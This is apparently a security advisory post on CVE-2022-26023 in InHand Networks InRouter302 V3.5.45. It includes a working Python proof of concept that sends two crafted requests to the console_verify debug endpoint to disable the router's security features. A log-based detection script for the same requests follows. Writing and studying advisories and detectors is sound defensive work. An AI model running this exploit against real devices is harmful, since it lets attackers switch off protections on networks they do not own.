CVE-2022-26023: Leftover Debug Code Vulnerability in InHand Networks InRouter302 Console Verify Functionality

In this post, we discuss CVE-2022-26023, a newly discovered vulnerability in the console verify functionality of InHand Networks InRouter302 V3.5.45. The issue arises from leftover debug code in the software; if exploited, it could allow an attacker to disable important security features.

Affected Devices and Software

Vendor: InHand Networks
Product: InRouter302
Version: V3.5.45

Exploit Details and Proof of Concept

A specially crafted series of network requests can exploit this vulnerability, allowing the attacker to disable security features that are meant to protect the device. The issue is due to leftover debug code, which was likely not meant to be included in the final product release but, through oversight, made its way into version 3.5.45 of InRouter302.

To exploit this vulnerability, the attacker would need to send a specific sequence of requests to the vulnerable device. Here is a snippet of code that demonstrates how the vulnerability can be exploited:

import requests

TARGET_IP = "192.168.1.1" # Replace with your target's IP address
SRC_IP = "192.168.1.33" # Replace with your source IP address

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
}

# First, we initiate the session to ensure proper session handling.
session = requests.Session()

# We then send the specially-crafted series of HTTP requests to trigger the vulnerability

# Trigger request 1
request_1_url = f"http://{TARGET_IP}/cgi-bin/console_verify/ufecgi?op=65002&id=&uip={SRC_IP}"
initiate_request_1 = session.get(request_1_url, headers=headers)

# Trigger request 2
request_2_url = f"http://{TARGET_IP}/cgi-bin/console_verify/ufecgi?op=65003&id=&msg=777786&uip={SRC_IP}"
initiate_request_2 = session.get(request_2_url, headers=headers)

# The security-relevant settings should now be disabled on the device

The provided code is for educational purposes only and should not be used maliciously or inappropriately.

References and Original Source

CVE Identifier: CVE-2022-26023
InHand Networks Official Website: https://www.inhandnetworks.com

Resolution and Mitigation

At the time of writing, it is unclear if the vendor of the affected product has released a security patch or firmware update to address this vulnerability. Users are urged to keep an eye on the official website of InHand Networks for any possible updates or advisories.
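
While patch status is unclear, requests to the debug endpoint can be watched for in HTTP logs. The detection script below is an added example, not part of the original post or any vendor code; it flags the `console_verify` path and the `op` values shown in the snippet above. The Common Log Format input, the five-minute window, and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs, unquote

# Path and op values come from the requests shown in this post.
DEBUG_PATH = "/cgi-bin/console_verify/ufecgi"
FIRST_OP, SECOND_OP = "65002", "65003"
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Assumed input: Common Log Format lines from a proxy or HTTP sensor
# sitting in front of the router's web interface.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')

def parse_line(line):
    """Return (client_ip, timestamp, path, op), or None if the line does not parse."""
    m = CLF.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    op = parse_qs(url.query, keep_blank_values=True).get("op", [""])[0]
    return m["ip"], ts, unquote(url.path).rstrip("/").lower(), op

def detect(lines):
    """Return (severity, client_ip, iso_timestamp) for each console_verify request."""
    alerts, first_seen = [], {}
    for ip, ts, path, op in filter(None, map(parse_line, lines)):
        if path != DEBUG_PATH:
            continue
        if op == FIRST_OP:
            first_seen[ip] = ts
        paired = op == SECOND_OP and ip in first_seen and \
            timedelta(0) <= ts - first_seen[ip] <= WINDOW
        if paired:
            del first_seen[ip]  # both requests seen from this client, in order
        alerts.append(("high" if paired else "info", ip, ts.isoformat()))
    return alerts

# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    '192.0.2.33 - - [09/Nov/2022:18:20:01 +0000] "GET /cgi-bin/console_verify/ufecgi?op=65002&id=&uip=192.0.2.33 HTTP/1.1" 200 12',
    '192.0.2.33 - - [09/Nov/2022:18:20:03 +0000] "GET /cgi-bin/console_verify/ufecgi?op=65003&id=&msg=777786&uip=192.0.2.33 HTTP/1.1" 200 12',
    '192.0.2.50 - - [09/Nov/2022:18:25:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.77 - - [09/Nov/2022:19:00:00 +0000] "GET /cgi-bin/console_verify/ufecgi?op=65003&id= HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(*alert)
```

Any hit on the path is reported as `info`, since a debug endpoint should see no routine traffic; the two `op` values arriving in order from one client within the window are raised to `high`.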

Conclusion

CVE-2022-26023 is a serious flaw in the console verify functionality of InHand Networks InRouter302 V3.5.45 due to leftover debug code. This can lead to disabling security features, compromising the integrity of the device and exposing it to further attacks. Keep an eye on the official vendor website for information on when a patch or updated firmware will be released.

Timeline

Published on: 11/09/2022 18:15:00 UTC
Last modified on: 11/10/2022 15:23:00 UTC